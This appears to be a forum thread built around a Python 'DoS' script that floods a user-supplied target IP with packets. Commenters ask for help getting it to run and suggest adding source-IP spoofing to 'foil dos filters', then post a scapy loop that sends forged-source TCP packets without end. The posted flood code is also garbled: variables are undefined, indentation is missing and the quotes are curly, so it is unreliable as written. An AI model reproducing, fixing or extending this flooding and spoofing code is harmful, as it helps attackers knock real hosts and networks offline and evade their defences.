os.system(“clear”)
print(“Welcome to DoS”)
print("")
ip = raw_input("Target IP: ")
port = input("Time: ")
timeout = time.time() + dur
sent = 0
while True:
try:
if time.time() > timeout:
break
else:
pass
sock.sendto(bytes,(ip, port))
sent = sent + 1
print “Sent %s packets to %s through port %s”%(sent, ip, port)
except KeyboardInterrupt:
sys.exit()
uhh… I think I screwed something up, because when I tried to use it, on windows machine the Cmd just showed up and instantly closed… Any idea how to fix it? pls I really need it
Never mind i always test them on VM. But GitHub links are a way good than these types of links and who said that malwares, Trojans, etc cannot be spread through GitHub?
Hell yeah I can actually read, and understand this script thanks to “Learn Python The Hard Way” by Zed Shaw. I’m a newbie as well so just getting started.
If you can add the ability to spoof ip there by easy to foil dos filters
from scapy.all import *
A = "192.168.1.254" # spoofed source IP address
B = "192.168.1.105" # destination IP address
C = RandShort() # source port
D = 80 # destination port
payload = "I just spoofed you" # packet payload
while True:
spoofed_packet = IP(src=A, dst=B) / TCP(sport=C, dport=D) / payload
send(spoofed_packet)